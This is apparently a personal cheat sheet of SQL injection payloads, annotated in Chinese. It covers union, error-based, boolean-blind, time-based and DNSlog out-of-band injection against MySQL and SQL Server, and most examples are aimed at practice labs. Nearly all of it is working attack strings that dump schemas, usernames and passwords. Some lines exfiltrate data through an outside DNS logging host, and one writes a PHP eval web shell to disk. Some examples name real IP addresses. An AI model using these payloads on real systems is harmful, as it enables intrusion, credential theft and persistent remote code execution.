
id=1
id=1'--+
测试注入点


1 order by 2#
?id=2 union select 1,2,3 --+
1 union select 1,database()#

1 union select 1,group_concat(table_name) from information_schema.tables where table_schema =database()#                        从所有的表里边找到这个库名里不重复的表名


1union select1, group_concat(column_name) from information_schema.columns where table_name='表名' #               从所有的列名里边找到这个表名里不重复的列名
                                            

user_id,first_name,last_name,user,password,avatar,last_login,failed_login。

1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #




less 1:
(Select schema _name from information_schema.schemata limit 0,1)

?id=-1' union select 1,2,(select group_concat(username,0x7e,password) from security.users) --+
?id=' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+
?id=-1' union select 1,2,(select group_concat(schema_name) from information_schema.schemata ) --+

stormgroup_member

错误注入判断：

?id=1' and (select count(*) from information_schema.tables group by concat((select version()),floor(rand(0)*2)))--+


?id=1' and (select count(*) from information_schema.tables group by concat((select group_concat(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2)))--+

 and extractvalue(1,concat(0x7e,(select user()),0x7e))--+

 and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+
' and updatexml(1,concat(0x7e,(select version())),1)#

 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)--+

referers 错误注入:
' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1))#
 ' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='referers' ),0x7e),1))#
referers

and (select 1 from (select count(*),concat('~',(select table_name from information_schema.tables where table_schema='hebjy1028' limit 0,1),'~',floor(rand(0)*2)) as a from information_schema.tables group by a)b)#


布尔盲注：

and left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='e'--+



left(database(),1)>'s'            截取前几位
select user() regexp '^r'

select user() like 'ro%'
43.247.91.228:84/Less-8/?id=1' and (select table_name from information_schema.tables where table_schema=database() limit 0,1)like 'e%'--+


and length(database())=n

ascii(substr((select database()),1,1))=98

and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=115--+

ord(mid((select user()),1,1))=114

时间注入:
?nav=26' and if(1=0,1, sleep(0)) --+
if(length(database())=12,sleep(2),100)--+
if(substring(database(),1,1)='p',111,sleep(3))--+
3.  判断表名
type=if(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1='a'),11111,sleep(1))--+
 4.    判断列名
type=if(substring((select column_name from information_schema.columns where table_name='flag' and table_schema='database()' limit0,1),1,1='a'),11111,sleep(1))--+
5.    判断具体字段内容
type=if(substring((select flag from pentesterlab.flag limit 0,1),1,1='a'),sleep(3),111111) --+ 
    
?id=1' and if(left(user(),1)='i',0,sleep(3))--+
Id=1' and sleep(10)
and if(length(database())=4 , sleep(3), 1) --+ 正确就延迟，错误就不延时
?id=1' and if(left(database(),1)='s' , sleep(3), 1) --+
           and if(left(database(),8)='security' , sleep(3), 1) --+
?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' , sleep(3), 1) --+
                                                  第一个库的前几个


?id=1" and if(ascii(substr(database(),1,1))>115,1,sleep(3))--+

?id=1" and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101,1,sleep(3))--+

?id=1" and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>105,1,sleep(3))--+

?id=1" and if(ascii(substr((select password from users limit 0,1),1,1))>68,1,sleep(3))--+

dnslog注入

?id=1' and if((select load_file(concat('\\\\',(select database()),'.hq87c4.ceye.io\\abc'))),1,0)--+

select load_file(concat('\\\\',(select database()),'.hq87c4.ceye.io\\abc'))),1,1)--+


/?id=1' and if((select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema='security' limit 0,1),'. hq87c4.ceye.io\\abc'))),1,1)--+

secquan.hq87c4.ceye.io



?id=1 order by 测试回显
?id =1 and 1=2 union select 1,2,3查看哪一行可注入语句


?id=2 and exists(select * from admin)
?id=2 and exists(select username from manage)
?id=2 and exists (select id from manage where len(username)=8 and ID=1)

id=1
id=1'--+


空格/**/ 等号like url编码 类型选择


select '<?php @eval($_POST[19801]);?>'INTO OUTFILE 'C://Users//Administrator//Desktop//UPUPW_AP5.2-1510//UPUPW_AP5.2//htdocs//19801.php'

mssql=sqlserver 注入{
2、判断字段长度
order by

3、找显位
id=-2 union all select 1,'2','3',4

4、查询基本信息（数据库名）
db_name
 ?id=2 and 1=2 union all select 1,(select db_name()), '3', 4 找到数据库名称。
 mozhe_db_v2

5、查表名   xtype='U' 为 用户表
id=-2 union all select 1,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u'),'3',4

6、查列名
id=-2 union all select 1,(select top 1 col_name(object_id('manage'),2) from sysobjects),(select top 1 col_name(object_id('manage'),3) from sysobjects),4

7、获取数据
id=-2 union all select 1,usename,password,4 from manage

获取当前用户和数据库版本和当前数据库
?id=-2 union all select 1,system_user,@@version,2
?id=-2 union all select 1,system_user,db_name(),2

加号的使用

%2B是+的编码，url中不能直接使用，否则会别解析为空格

http://219.153.49.228:49135/new_list.asp?id=2 and 1=0 union all select 1,system_user%2B'|'%2Bdb_name(),@@version,2

翻译成为

http://219.153.49.228:49135/new_list.asp?id=2 and 1=0 union all select 1,system_user+'|'+db_name(),@@version,2

枚举出当前所有的数据库

?id=-2 union all select 1,system_user%2B'|'%2Bdb_name(),name,2 from master..sysdatabases
?id=-2 union all select 1,system_user%2B'|'%2Bdb_name(),name,2 from master..sysdatabases where name not in('master')
直到报错
?id=-2 union all select 1,system_user%2B'|'%2Bdb_name(),name,2 from master..sysdatabases where name not in('master','model','mozhe_db_v2','msdb','tempdb')
枚举库所有列表
?id=-2 union all select 1,system_user%2B'|'%2Bdb_name(),name,2 from mozhe_db_v2..sysobjects
where xtype='u'
?id=-2 union all select 1,system_user%2B'|'%2Bdb_name(),name,2 from mozhe_db_v2..sysobjects 

where xtype='u' and name not in ('manage')
直到报错
?id=-2 union all select 1,system_user%2B'|'%2Bdb_name(),name,2 from mozhe_db_v2..sysobjects 

where xtype='u' and name not in ('manage','announcement')
枚举出表的字段名
?id=-2 union all select 1,(select top 1 col_name(object_id('manage'),1) from sysobjects),'3',nul
?id=-2 union all select 1,(select top 1 col_name(object_id('manage'),2) from sysobjects),'3',nul
?id=-2 union all select 1,(select top 1 col_name(object_id('manage'),3) from sysobjects),'3',nul
获取到manage的字段名为：id,username,password

爆字段内容
?id=-2 union all select 1,(select username from manage),(select password from manage where username in ('admin')),null
?id=-2 union all select 1,(select password from manage),(select username from manage where password in ('admin')),null
}
